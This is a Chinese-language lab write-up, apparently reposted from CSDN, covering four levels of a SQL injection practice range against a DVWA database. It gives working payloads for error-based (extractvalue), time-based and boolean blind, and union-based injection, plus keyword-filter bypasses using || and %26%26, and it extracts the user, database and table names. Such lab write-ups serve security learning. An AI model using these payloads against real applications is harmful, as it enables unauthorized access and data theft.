码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 【sql注入】sql关卡1~4


    前言: 靶场自取

    level-1

    测试注入点

    POC: 1,1',1'',1"",1/1,1/0

    ==》存在注入点

    爆破

    POC: id=-1'+and+extractvalue(1,concat(0x7e,user(),0x7e))--+
    在这里插入图片描述

    level-2

    尝试注入点

    POC1:admin'
    POC2:admin''
    POC3:admin''+and+sleep(3)--+
    POC4: admin'+and+if(1,1,0)=0--+
    POC5: admin'+and+if(1,1,0)=1--+
    在这里插入图片描述
    ==》
    POC1,POC2没有反应
    POC3存在延时输出,存在休眠盲注
    POC4、POC5存在content-length周期变化,存在布尔盲注

    爆破

    尝试盲注

    • step1: 爆破数据库名
      在这里插入图片描述
      在这里插入图片描述
      ==》 数据库长度为4

    • step2: 获取数据库每个字符
      在这里插入图片描述
      在这里插入图片描述
      ==》 database: dvwa
      同理得到用户名:root@localhost

      ==》爆出表名
      POC:id=admin'+and+if(substr(concat(0x7e,(select+(select+group_concat(table_name)+from+information_schema.tables+where+table_schema=database())),0x7e),§1§,1)='§a§',1,0)--+
      在这里插入图片描述
      ==》得到表名:guestbook,users

    level-3

    测试注入点

    利用1,1’,1",1/1,1/2
    在这里插入图片描述
    ===》
    a. 存在注入点
    b. 注入点是表名,猜想sql语句为select * from '$id$ where user_id='1' LIMIT 0,1

    爆破

    POC=id=(select(extractValue(1,concat(0x7e,(select+(select+group_concat(table_name)+from+information_schema.tables+where+table_schema=database())),0x7e))))as+a--+
    在这里插入图片描述
    3. 尝试表名
    在这里插入图片描述
    4. 尝试爆破其他字段

    • 方式一:union方式

      • step1: 获取列数(二分法)
        POC1: id=users+order+by 10 //不回显
        POC2: id=users+order+by 5 //回显
        POC3: id=users+order+by 7 //回显
        POC4: id=users+order+by 8 //回显
        POC5: id=users+order+by 9 //不回显
        在这里插入图片描述 ===》 8列

      • step2: 获取回显位
        POC: id=users+where+user_id=-1+union+select+1,2,3,4,5,6,7,8--+
        注意这里需要手动构造where user_id=-1 在这里插入图片描述==》 回显位:4,5

      • step 3: 爆破数据

        • 爆破用户名、数据库
          POC: id=users+where+user_id=-1+union+select+1,2,3,user(),database(),6,7,8--+
          在这里插入图片描述
    • 方式二:报错函数方式

      • 爆破用户名
        POC: id=(select(extractvalue(1,concat(0x7e,user()))))as+a--+
        在这里插入图片描述
      • 爆出数据库
        POC: id=(select(extractvalue(1,concat(0x7e,database()))))as+a--+
        在这里插入图片描述

    level-4

    测试注入点

    POC: 1'、1"、1""、1/0、1/1,sleep

    ==》 id=1存在注入

    爆破

    • POC: id=1'+and+extractvalue(1,concat(0x7e,user(),0x7e))--+

    在这里插入图片描述
    ==》and被转移为_了

    • 尝试使用||代替and。
      POC: id=1'+||+extractvalue(1,concat(0x7e,user(),0x7e))--+
      在这里插入图片描述

    ==》成功爆破

    • 尝试%26代替
      POC: id=1'%26%26+extractvalue(1,concat(0x7e,user(),0x7e))--+
      在这里插入图片描述
      ==》成功爆破
  • 相关阅读:
    redux 和 react-redux
    基于javaweb的职工考勤系统
    金山云冲刺港股拟双重主要上市:年营收90亿 为雷军力挺项目
    Docker 网络管理及资源控制
    519. 随机翻转矩阵
    华为存储s2600t配置上架
    OFDM 十六讲 5 -Discrete Convolution, ISI and ICI on DMT/OFDM Systems
    给开源项目做一个漂亮简洁的版本迭代更新图,生成固定链接复制到介绍中、公众号菜单链接中、博客中等
    多链路自检与灵活组网:新能源充电桩物联网5G工业路由器
    【网络安全】【深度学习】【入侵检测】SDN模拟网络入侵攻击并检测,实时检测,深度学习【二】
  • 原文地址:https://blog.csdn.net/iplayvs2008/article/details/134183618
  • 最新文章
  • 沪漂五周年了:我越来越迷茫了
    Agentic Skill Routing 实战:别再把所有 Skill 塞进 AI Agent 上下文
    MySQL-Seconds_behind_master的精度误差
    [MAF预定义ChatClient中间件-03]CachingChatClient——利用缓存省钱省时间
    AI的至暗历史:从万众期待到被政府撤资,AI的两次死亡徘徊
    Agent OS :五种驯服不确定性的范式
    PortSwigger SQL注入LAB11
    数据库即时编译JIT
    [Begin]AI Learn Data Day 0
    深度学习进阶(二十七)现代 LLM 的核心架构设计其二:SwiGLU
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
小工具 小游戏
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1

京公网安备 11010502049817号